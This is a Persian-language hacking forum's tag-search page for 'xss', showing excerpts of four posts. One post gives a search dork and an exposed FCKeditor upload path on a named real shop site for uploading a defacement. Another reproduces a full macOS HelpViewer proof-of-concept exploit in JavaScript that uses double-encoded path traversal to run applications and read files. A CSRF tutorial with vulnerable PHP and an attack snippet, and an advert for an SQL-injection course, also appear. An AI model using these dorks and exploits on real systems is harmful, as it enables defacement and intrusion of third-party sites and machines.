رفتن به مطلب
امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند



iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'xss'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

35 نتیجه پیدا شد

  1. Hacking-Bugs

    باگ xss نوعی از خطرناک ترین باگ ها در روی سایت ها می باشد دروک مورد نیاز برای یافتن سایت های دارای باگ xss دروک 👇 inurl:frame=product_detail خب حالا خواستیم دیفیس خود را روی سایتی که دارای باگ هست اپلود کنیم دروک زیر را بخ اخر سایت وارد میکنیم. مثلا اگه ادرس سایت مثل ادرس زیر هست VegaStore - Chuyên Mua Bán SmartPhone دروک زیرا به این صورت وارد میکنیم/jscripts/FCKeditor/editor/filemanager/upload/test.html دروک را به این صورت روی سایت وارد میکنیم http://vegastorevn.com/jscripts/FCKeditor/editor/filemanager/upload/test.html وحالا میتونیم دیفیس خود را اپلود کنیم با تشکر ✌ اموزشی ساده برای تازه کارا میباشد
  2. <!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1040 HelpViewer is an application and using WebView to show a help file. You can see it simply by the command: open /Applications/Safari.app/Contents/Resources/Safari.help or using "help:" scheme: help:openbook=com.apple.safari.help help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest. HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../". PoC: document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)"; The attached poc will pop up a Calculator. Tested on macOS Sierra 10.12.1 (16B2659). --> <script> /* OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read. HelpViewer is an application and using WebView to show a help file. You can see it simply by the command: open /Applications/Safari.app/Contents/Resources/Safari.help or using "help:" scheme: help:openbook=com.apple.safari.help help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest. HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../". PoC: document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)"; The attached poc will pop up a Calculator. Tested on macOS Sierra 10.12.1 (16B2659). */ function main() { function second() { var f = document.createElement("iframe"); f.onload = () => { f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app"; }; f.src = "help:openbook=com.apple.safari.help"; document.documentElement.appendChild(f); } var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();"; document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url; } main(); </script>
  3. Hacking-Bugs

    باسلام. دوره آموزشی باگ SQL INJECTION یادگیری تمامی مراحل تزریق کد یادگیری تمامی بایپس ها اموزش به صورت ویدیو قوانین تاپیک : ارسال ممنوع سوال ممنوع اسپم ممنوع رمز فایل ها : www.anonysec.org
  4. Hacking-Bugs

    اگر در زمینه نفوذ یا امنیت وب سایت و اپلیکیشن های تحت وب تجربه کار و یا آشنایی داشته باشید، قطعا با عنوان سری حملات باگ CSRF برخورده اید. در این پست شما با این باگ اشنا می کنیم و نحوه استفاده و جلوگیری از آن رو آموزش می دیم CSRF چیست ؟ حملات CSRF مخفف عبارت Cross Site Request Forgery میباشد که در اطلاح و عمل به معنای عبور از درخواست های سایت و ارسال درخواست های جعلی به آن است. فرض کنید در پنل مدیریت سایت شما صفحه ای مربوط به تغییر ایمیل و کلمه عبور وجود دارد شما با وارد کردن رمز عبور و تکرار آن میوانید به سرعت رمز عبور خود را تغییر دهید اما در پشت پرده درخواست شما به سرور ارسال میشود و سرور با استفاده از کوکی های ارسالی توسط مرورگر و بررسی صحت آن ، درخواست شما را میپذیرد و رمز عبورتان تغییر میابد اگر این درخواست از سوی شخص دیگری ارسال گردد از آنجایی که کوکی های ارسالی بی اعتبار است درخواست مربوطه توسط سرور رد میشود. حال اگر این درخواست بدون آنکه متوجه شوید از سوی شما ارسال گردد چه اتفاقی رخ خواهد داد؟ حملات CSRF مرورگر قربانی را وادار به انجام و ارسال دستورات مورد نظر خود ميکند ، البته اين مشکل به علت برنامه نويسی غلط و همين طور استفاده از بعضی توابع شکل ميگيرد با هم مثال زير را مرور و تشريح می کنيم فرض کنید هدف شما دارای یک سیستم خبری هست ، در پنل صفحه برای حذف اخبارتان وجود دارد. قسمتی از کد صفحه حذف خبرها : <?php check_auth(); if(isset($_GET['news'])) { unlink('files/news' .$news.'.txt'); } else { die('File not deleted'); } ?> اسم این فایل برای مثال remove.php است. بدین شکل به عنوان ادمین می توانی ، یک خبر را با دستور Get حذف کنین: https://coco-coder.com/remove.php?news=1 اگر هدف به پنل کاربری خودش وارد شود با باز کردن این لینک مطلب حذف خواهد شد. اما سوال اینجا پیش می آید یک هکر چگونه می تواند از این باگ استفاده کند. کافیه فرمی مخفی در یک صفحه html کار گذاشته بشه که داخل اون فریم ، فرم حذف کردن پست باشه و پس از لود صفحه اون فرم با جاوا اسکریپت ثبت و اجرا می شود مراحل کار ابتدا یک صفحه ساخته و کد زیر را درون آن جای می گذاریم. <img src="www.coco-coder.com/remove.php?news=1" width="2" height="2"> حالا لینک صفحه ای که ساختیم به تارگت خدمون ارسال میکنیم و تارگت بدون این که اطلاعی داشته باشد ، با اجرا کردن صفحه درخواست حذف خبر انجام داده . حفاظت در برابر باگ CSRF پيشنهاداتی براي برنامه نويسان : استفاده از کدهای تایید هویت یا Captcha بررسی و منقضی کردن کوکی ها استفاده از شناسه معتبر یا Valid Token تا جای ممکن از متد GET استفاده نکنید برای اطلاعات حساس ، هرچند متد POST نیز از این قاعده به دور نیست. موفق باشید...
×